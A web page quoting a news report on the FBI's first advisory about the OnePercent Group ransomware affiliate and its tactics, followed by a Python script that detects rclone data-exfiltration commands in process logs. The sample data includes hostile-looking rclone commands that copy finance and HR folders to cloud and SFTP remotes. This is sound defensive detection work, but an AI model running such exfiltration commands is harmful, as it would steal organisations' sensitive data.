Accurate, Focused Research on Law, Technology and Knowledge Discovery Since 2002

FBI sends its first-ever alert about a ‘ransomware affiliate’

The Record: “The US Federal Bureau of Investigation has published today its first-ever public advisory detailing the modus operandi of a “ransomware affiliate.” A relatively new term, a ransomware affiliate refers to a person or group who rents access to Ransomware-as-a-Service (RaaS) platforms, orchestrates intrusions into corporate networks, encrypts files with the “rented ransomware,” and then earns a commission from successful extortions. Going by the name of OnePercent Group, the FBI said today this threat actor has been active since at least November 2020. Per the FBI report [PDF], historically, the group has primarily relied on the following tactics for its attacks:

  • Used phishing email campaigns to infect victims with the IcedID trojan.
  • Used the IcedID trojan to deploy additional payloads on infected networks.
  • Used the Cobalt Strike penetration testing framework to move laterally across a victim’s network.
  • Used RClone to exfiltrate sensitive data from a victim’s servers.
  • Encrypted data and demanded a ransom.
  • Phoned or emailed victims to threaten to sell their stolen data on the dark web if they didn’t pay on time…”
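The exfiltration step above (RClone pushing data from a victim's servers) is the one a defender can most readily hunt for in endpoint telemetry. The following is an added example, not part of The Record's article or the FBI advisory: a small Python detection that inspects constructed process-creation events for rclone transfer commands aimed at a cloud or SFTP remote. It keys on rclone's real command syntax (`copy`/`sync`/`move` with a `name:path` remote and the `--config` flag) rather than the binary name alone, so a renamed executable is still caught while a harmless `rclone version` is not. The event fields, hostnames and paths are hypothetical sample data.

```python
import re
import shlex
from typing import Dict, List

# Constructed sample process-creation events (hypothetical, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "fileserver01", "user": "svc_backup",
     "image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": r'rclone.exe copy "D:\Finance" mega:exfil --config C:\Users\Public\rclone.conf -q --transfers 16'},
    {"host": "ws-12", "user": "jdoe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
    {"host": "dc01", "user": "admin",
     "image": r"C:\Users\Public\svchost.exe",   # rclone renamed to blend in
     "cmdline": r'svchost.exe sync \\fileserver01\HR sftp-drop:/in --config C:\Users\Public\r.conf'},
    {"host": "ws-07", "user": "jdoe",
     "image": r"C:\Tools\rclone.exe",
     "cmdline": "rclone.exe version"},             # benign: no transfer
]

# rclone subcommands that move data between a source and a destination.
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}

# rclone addresses a configured remote as "name:path". The negative lookahead
# excludes Windows drive letters such as D:\ or C:/ so local paths do not match.
REMOTE_DEST = re.compile(r"^(?![A-Za-z]:[\\/])[A-Za-z0-9_-]+:")


def _basename(path: str) -> str:
    """Last path component, lower-cased, with any surrounding quotes removed."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def rclone_indicators(event: Dict[str, str]) -> List[str]:
    """Return the rclone-related indicators present in one process event."""
    reasons: List[str] = []
    try:
        # posix=False keeps Windows backslashes literal instead of treating them as escapes.
        argv = shlex.split(event["cmdline"], posix=False)
    except ValueError:
        return reasons  # unbalanced quotes: nothing to parse
    if _basename(event["image"]) == "rclone.exe":
        reasons.append("rclone_binary")
    tokens = [t.strip('"') for t in argv]
    verb = tokens[1] if len(tokens) > 1 else ""
    # A transfer verb whose arguments include a remote is the strong signal:
    # it fires even when the binary has been renamed.
    if verb in RCLONE_TRANSFER_VERBS and any(REMOTE_DEST.match(t) for t in tokens[2:]):
        reasons.append("transfer_to_remote")
    if "--config" in tokens:
        reasons.append("custom_config")
    return reasons


def is_exfil_candidate(event: Dict[str, str]) -> bool:
    """True when the event looks like an rclone transfer to an external remote."""
    return "transfer_to_remote" in rclone_indicators(event)


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one finding per event that qualifies as an exfiltration candidate."""
    return [
        {"host": e["host"], "user": e["user"], "indicators": rclone_indicators(e)}
        for e in events
        if is_exfil_candidate(e)
    ]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample data, `scan` flags the `fileserver01` and `dc01` events (the second despite the renamed binary) and ignores both the notepad process and the bare `rclone version` call. The same rule is straightforward to port to a SIEM query or a Sigma rule: match a transfer verb plus a `name:` remote in the command line, and treat `--config` pointing at a world-writable location as a corroborating signal.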
